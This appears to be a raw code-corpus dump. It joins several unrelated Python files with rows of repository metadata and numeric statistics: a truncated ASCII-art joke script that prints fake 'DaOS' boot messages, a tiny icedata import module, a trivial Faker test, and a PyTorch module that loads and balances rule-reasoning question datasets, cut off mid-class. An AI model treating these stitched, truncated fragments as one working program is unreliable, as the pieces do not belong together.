MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMmhdMMMMMd/dmdddddddddddhys+:----.-/osyyyyyyo/yddmmmddhs::///:..:oyyhhhddmmmmmmmNNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNmmddmmddddddddddhs/--:ossysyy+ymNNNNmmdo/+syhyso+/``.:oyhhhddddmmmNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMmyyhdm/hMMMMMMMMNmmddmmdddddhhhhs+/::--:osysyyyyo:/shyyso/:.`````-/oyhyhhddddmmmmmNNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNmmddmmmddddddddddhs+/:-:ooo/:+yyyyyss+---/+o+:...-/syhhdddddmmmNMMMMMMMhs+hyymMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMN..+ydNNMMMMMMMMMMMNmmdmmmmmdddhhhhyso+:::/::oo+:--.--..``````.-/oyyyyhhddddmmmmmmNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNmmmmmmmmmmdddddddhys+/::----:----..........-:+syhhhhdddmmmmNNMMMMMMMMMdhd:-ohosMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMhdMMMMMMMMMMMMMMMMMNNmmmmmmmmdddhhhhhhyso+//:--........--::+osyyyyhhhdddmmmmmmmNNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNNmmmmmmmmmdddddddddhhyso+////:::::::://+osyyhhhhddddmmmmNNMMMMMMMMMMMMMMMNmhy+MMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNNMMMMMMMMMMMMMMMMMMMMMNNmmmmmmmmdddddhhhhhhhyyyssoooosssyyyyyyyyhhhddddmmmmmmmNNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNNmmmmmmmmmmdddddddhhhhhhyyyyyyyyyyhhhhhhddddddmmmmNNMMMMMMMMMMMMMMMMMMMMdysNMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM::dNMMMMMMMMMMMMMMMMMMMMMNNNmmmmmmmmmdddddhhhhhhhhhhyyyyyyyhhhhdddddmmmmmmmmNNNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNNmmmmmmmmmmmmdddddddddhhhhhhhhhhhddddddmmmmmmmNMMMMMMMMMMMMMMMMMMMMMNhy:`dMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMmosmMMMmymdNMMMMMMMMMMMMMMMMMNNmmmmmmmmmmmmdddddddddddddddddddmmmmmmmmmmmmNNMNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNNNNmmmmmmmmmmmmddddddddddddddddmmmmmmmmNNMMMMMMMMMMMMMMMMMMMMMMMM/ -:oNMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMs-::oMMMMMMMMMMMMMMMMMMMMNNNNmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmNNNNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNNNNNmmmmmmmmmmmmmmmmmmmmmmmmmNNNMMMMMMMMMMMMMMMMMMMMMNNMMMMMMdyhdMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMmyNMmdNMMMMMMMNNNNNNmmmmmmmmmmmmmmmmmmmmmmmNNNNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNMNNNNNNNNNNNNNNNNNNNNNNMMMMMMMMMMMMMMdydNNMMdhhds/-:MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMmhMMo`/sddy+++oNMMMMNNyyhdmmmmdddddmmmNNNNNMMMMMNNNNNNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNmNNNNNNmmmNNNNNNNNNNmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMmhdmMMMMMy+++sMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMm.o/:+NMh-:yyyymMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMhos++++oyhNMMMMMN+++shymdsoooosyMMMMMMMMMMm::::::syMNdsyyyyyhyoooooy///////////---------------------s+----------------ymo-:dmmmmh/::-::::::--:yd/-ymh---`-yhs-------------+s---------------.-mMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMhoooymMMMMMdyyyhMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNhmNmmmMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMm++++++ohyyyyyhmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmNNmmmmmmmmmmmmmmmmNMNmmMMMMMMMMMMMMMMMMMMMMMNmNMMmmmmmMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMdhmmMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
""";
print("Starting da convertible kernel v3.0...");
time.sleep(2);
print("Loading daconvertible-ubuntu1..");
time.sleep(2);
print("Playing local audio file /daOS/daSystem/daMedia/daMusic.dap..");
time.sleep(1);
print("Merging daconvertible-ubuntu1 with dahead-ubuntu2");
time.sleep(1);
print("Loading da driver modules...")
print("Starting daDesktop...");
time.sleep(3);
print("DaOS successfully booted.");
print("LET'S GOOOOO!!!!!!");
time.sleep(5);
print(daDesktop);
| 448.41358
| 516
| 0.802693
| 858
| 72,643
| 67.960373
| 0.786713
| 0.240096
| 0.308695
| 0.342994
| 0.137198
| 0.137198
| 0.085749
| 0.085749
| 0.085749
| 0
| 0
| 0.000152
| 0.003992
| 72,643
| 162
| 517
| 448.41358
| 0.805758
| 0
| 0
| 0.118012
| 0
| 0.068323
| 0.996861
| 0.988506
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.006211
| 0
| 0.006211
| 0.055901
| 0
| 0
| 1
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
15c7a95365a5d379d8b277edf2a1575af905cac4
| 84
|
py
|
Python
|
icedata/datasets/biwi/__init__.py
|
ganesh3/icedata
|
16c26ea3d8f96b99357683849d6bd363bf12a827
|
[
"Apache-2.0"
] | null | null | null |
icedata/datasets/biwi/__init__.py
|
ganesh3/icedata
|
16c26ea3d8f96b99357683849d6bd363bf12a827
|
[
"Apache-2.0"
] | null | null | null |
icedata/datasets/biwi/__init__.py
|
ganesh3/icedata
|
16c26ea3d8f96b99357683849d6bd363bf12a827
|
[
"Apache-2.0"
] | null | null | null |
from icedata.datasets.biwi.data import *
from icedata.datasets.biwi.parser import *
| 28
| 42
| 0.809524
| 12
| 84
| 5.666667
| 0.583333
| 0.323529
| 0.558824
| 0.676471
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.095238
| 84
| 2
| 43
| 42
| 0.894737
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
c61625528b7120766e0d6f192cae4edd2399fc0b
| 49
|
py
|
Python
|
build/lib/utils/myUtil.py
|
kevin72500/CoreUtils
|
569b3462be201b1aeced6158c7f75746385cb573
|
[
"MIT"
] | null | null | null |
build/lib/utils/myUtil.py
|
kevin72500/CoreUtils
|
569b3462be201b1aeced6158c7f75746385cb573
|
[
"MIT"
] | null | null | null |
build/lib/utils/myUtil.py
|
kevin72500/CoreUtils
|
569b3462be201b1aeced6158c7f75746385cb573
|
[
"MIT"
] | null | null | null |
import Faker
def out():
print('this is test')
| 16.333333
| 25
| 0.653061
| 8
| 49
| 4
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.204082
| 49
| 3
| 25
| 16.333333
| 0.820513
| 0
| 0
| 0
| 0
| 0
| 0.24
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0.333333
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
bafe5b8cfefbc9af6970a99d442487e27583f70f
| 14,533
|
py
|
Python
|
spectre/datasets.py
|
IBM/Neural_Unification_for_Logic_Reasoning_over_Language
|
1624c499743b3e2539c6640b9ac1d6bf8ff88d5d
|
[
"Apache-2.0"
] | 16
|
2021-09-20T05:24:44.000Z
|
2022-03-15T07:12:21.000Z
|
spectre/datasets.py
|
IBM/Neural_Unification_for_Logic_Reasoning_over_Language
|
1624c499743b3e2539c6640b9ac1d6bf8ff88d5d
|
[
"Apache-2.0"
] | null | null | null |
spectre/datasets.py
|
IBM/Neural_Unification_for_Logic_Reasoning_over_Language
|
1624c499743b3e2539c6640b9ac1d6bf8ff88d5d
|
[
"Apache-2.0"
] | 1
|
2022-03-15T07:12:20.000Z
|
2022-03-15T07:12:20.000Z
|
import enum
import random
from torch.utils.data import Dataset
import json
class CWA(str, enum.Enum):
ALL = "all",
CWA = "cwa",
NOT_CWA = "not_cwa",
class RuleReasoningDataset(Dataset):
def __init__(self, root, depths, split='train', select_depth=None):
self.data = []
self.label_dict = {True: 1, False: 0}
for depth in depths:
with open(f'{root}/depth-{depth}/{split}.jsonl', 'r') as f:
lines = [json.loads(jline) for jline in f.read().split('\n')]
for line in enumerate(lines):
context = line[1]['context']
questions = line[1]['questions']
for question in questions:
x = question['meta']['QDep']
d = (context, question['text'], question['label'])
if select_depth is not None:
if x in select_depth:
self.data.append(d)
else:
self.data.append(d)
print("Data size:", len(self.data))
def __getitem__(self, index):
context, question, answer = self.data[index]
return context, question, self.label_dict[answer]
def __len__(self):
return len(self.data)
class RuleReasoningDatasetForCWAClassification(Dataset):
def __init__(self, root, depths, split='train', select_depth=None):
self.data = []
self.label_dict = {True: 1, False: 0}
for depth in depths:
with open(f'{root}/depth-{depth}/{split}.jsonl', 'r') as f:
lines = [json.loads(jline) for jline in f.read().split('\n')]
for line in enumerate(lines):
context = line[1]['context']
questions = line[1]['questions']
for question in questions:
x = question['meta']['QDep']
label = not ("proof" in question['meta']['strategy'] or "inv-proof" in question['meta']['strategy'])
d = (context, question['text'], label)
if select_depth is not None:
if x in select_depth:
self.data.append(d)
else:
self.data.append(d)
print("Data size:", len(self.data))
def __getitem__(self, index):
context, question, answer = self.data[index]
return context, question, self.label_dict[answer]
def __len__(self):
return len(self.data)
class RuleReasoningDatasetOnlyCWA(Dataset):
def __init__(self, root, depths, split='train', select_depth=None):
self.data = []
self.label_dict = {True: 1, False: 0}
for depth in depths:
with open(f'{root}/depth-{depth}/{split}.jsonl', 'r') as f:
lines = [json.loads(jline) for jline in f.read().split('\n')]
for line in enumerate(lines):
context = line[1]['context']
questions = line[1]['questions']
for question in questions:
x = question['meta']['QDep']
if not ("proof" in question['meta']['strategy'] or "inv-proof" in question['meta']['strategy']):
d = (context, question['text'], question['label'])
if select_depth is not None:
if x in select_depth:
self.data.append(d)
else:
self.data.append(d)
print("Data size:", len(self.data))
def __getitem__(self, index):
context, question, answer = self.data[index]
return context, question, self.label_dict[answer]
def __len__(self):
return len(self.data)
class RuleReasoningDatasetOnlyNotCWA(Dataset):
def __init__(self, root, depths, split='train', select_depth=None):
self.data = []
self.label_dict = {True: 1, False: 0}
for depth in depths:
with open(f'{root}/depth-{depth}/{split}.jsonl', 'r') as f:
lines = [json.loads(jline) for jline in f.read().split('\n')]
for line in enumerate(lines):
context = line[1]['context']
questions = line[1]['questions']
for question in questions:
x = question['meta']['QDep']
if "proof" in question['meta']['strategy'] or "inv-proof" in question['meta']['strategy']:
d = (context, question['text'], question['label'])
if select_depth is not None:
if x in select_depth:
self.data.append(d)
else:
self.data.append(d)
print("Data size:", len(self.data))
def __getitem__(self, index):
context, question, answer = self.data[index]
return context, question, self.label_dict[answer]
def __len__(self):
return len(self.data)
class RuleReasoningDatasetAllBalanced(Dataset):
def __init__(self, root, depths, split='train', select_depth=None):
self.data = []
self.label_dict = {True: 1, False: 0}
for depth in depths:
with open(f'{root}/depth-{depth}/{split}.jsonl', 'r') as f:
lines = [json.loads(jline) for jline in f.read().split('\n')]
for line in enumerate(lines):
context = line[1]['context']
questions = line[1]['questions']
for question in questions:
x = question['meta']['QDep']
if "proof" in question['meta']['strategy'] or "inv-proof" in question['meta']['strategy']:
d = (context, question['text'], question['label'])
if select_depth is not None:
if x in select_depth:
self.data.append(d)
else:
self.data.append(d)
not_false_queries = list(filter(lambda x: "not" in x[1] and x[2] is False, self.data))
not_true_queries = list(filter(lambda x: "not" in x[1] and x[2] is True, self.data))
self.data = [item for item in self.data if item not in not_false_queries and item not in not_true_queries]
self.__balance_negative_queries_lists(not_false_queries, not_true_queries)
not_not_true_queries = list(filter(lambda x: "not" not in x[1] and x[2] is True, self.data))
n_not_not_false_queries = len(list(filter(lambda x: "not" not in x[1] and x[2] is False, self.data)))
self.data = [item for item in self.data if item not in not_not_true_queries]
random.shuffle(not_not_true_queries)
self.data.extend(not_not_true_queries[0:n_not_not_false_queries])
print("Data size:", len(self.data))
def __balance_negative_queries_lists(self, queries_1, queries_2):
if len(queries_2) > len(queries_1):
queries_1, queries_2 = queries_2, queries_1
random.shuffle(queries_1)
while len(queries_1) > len(queries_2):
e = queries_1.pop()
new_query = e[1].replace("not", "")
new_label = not e[2]
self.data.append((e[0], new_query, new_label))
self.data.extend(queries_1)
self.data.extend(queries_2)
def __len__(self):
return len(self.data)
def __getitem__(self, index):
context, question, answer = self.data[index]
return context, question, self.label_dict[answer]
# class RuleReasoningDatasetAllBalanced(Dataset):
# def __init__(self, root, depths, split='train', select_depth=None):
# self.data = []
# self.label_dict = {True: 1, False: 0}
# for depth in depths:
# with open(f'{root}/depth-{depth}/{split}.jsonl', 'r') as f:
# lines = [json.loads(jline) for jline in f.read().split('\n')]
# for line in enumerate(lines):
# context = line[1]['context']
# questions = line[1]['questions']
# for question in questions:
# x = question['meta']['QDep']
# if "proof" in question['meta']['strategy'] or "inv-proof" in question['meta']['strategy']:
# d = (context, question['text'], question['label'])
# if select_depth is not None:
# if x in select_depth:
# self.data.append(d)
# else:
# self.data.append(d)
# with_not_false_queries = list(filter(lambda x: "not" in x[1] and x[2] is False, self.data))
# with_not_true_queries = list(filter(lambda x: "not" in x[1] and x[2] is True, self.data))
# without_not_true_queries = list(filter(lambda x: "not" not in x[1] and x[2] is True, self.data))
# without_not_false_queries = list(filter(lambda x: "not" not in x[1] and x[2] is False, self.data))
# self.data = []
# random.shuffle(without_not_true_queries)
# ratio = 0.1
# n = int(ratio*len(without_not_false_queries))
# self.data.extend(without_not_true_queries[0:n])
# self.data.extend(without_not_false_queries)
#
# random.shuffle(with_not_false_queries)
# n = int(ratio * len(with_not_true_queries))
# self.data.extend(with_not_false_queries[0:n])
# self.data.extend(with_not_true_queries)
#
# print("Data size:", len(self.data))
def __len__(self):
return len(self.data)
def __getitem__(self, index):
context, question, answer = self.data[index]
return context, question, self.label_dict[answer]
class RuleReasoningDatasetNotCWATrueBalanced(Dataset):
def __init__(self, root, depths, split='train', select_depth=None):
self.data = []
self.label_dict = {True: 1, False: 0}
for depth in depths:
with open(f'{root}/depth-{depth}/{split}.jsonl', 'r') as f:
lines = [json.loads(jline) for jline in f.read().split('\n')]
for line in enumerate(lines):
context = line[1]['context']
questions = line[1]['questions']
for question in questions:
x = question['meta']['QDep']
if "proof" in question['meta']['strategy'] or "inv-proof" in question['meta']['strategy']:
d = (context, question['text'], question['label'])
if select_depth is not None:
if x in select_depth:
self.data.append(d)
else:
self.data.append(d)
not_false_queries = list(filter(lambda x: "not" in x[1] and x[2] is False, self.data))
not_true_queries = list(filter(lambda x: "not" in x[1] and x[2] is True, self.data))
self.data = [item for item in self.data if item not in not_false_queries and item not in not_true_queries]
self.__balance_negative_queries_lists(not_false_queries, not_true_queries)
print("Data size:", len(self.data))
def __balance_negative_queries_lists(self, queries_1, queries_2):
if len(queries_2) > len(queries_1):
queries_1, queries_2 = queries_2, queries_1
random.shuffle(queries_1)
while len(queries_1) > len(queries_2):
e = queries_1.pop()
new_query = e[1].replace("not", "")
new_label = not e[2]
self.data.append((e[0], new_query, new_label))
self.data.extend(queries_1)
self.data.extend(queries_2)
def __getitem__(self, index):
context, question, answer = self.data[index]
return context, question, self.label_dict[answer]
def __len__(self):
return len(self.data)
class BirdElectricityDataset(Dataset):
def __init__(self, root, split='train', select_depth=None, name_data=None, cwa=CWA.ALL):
self.data = []
self.label_dict = {True: 1, False: 0}
with open(f'{root}/{split}.jsonl', 'r') as f:
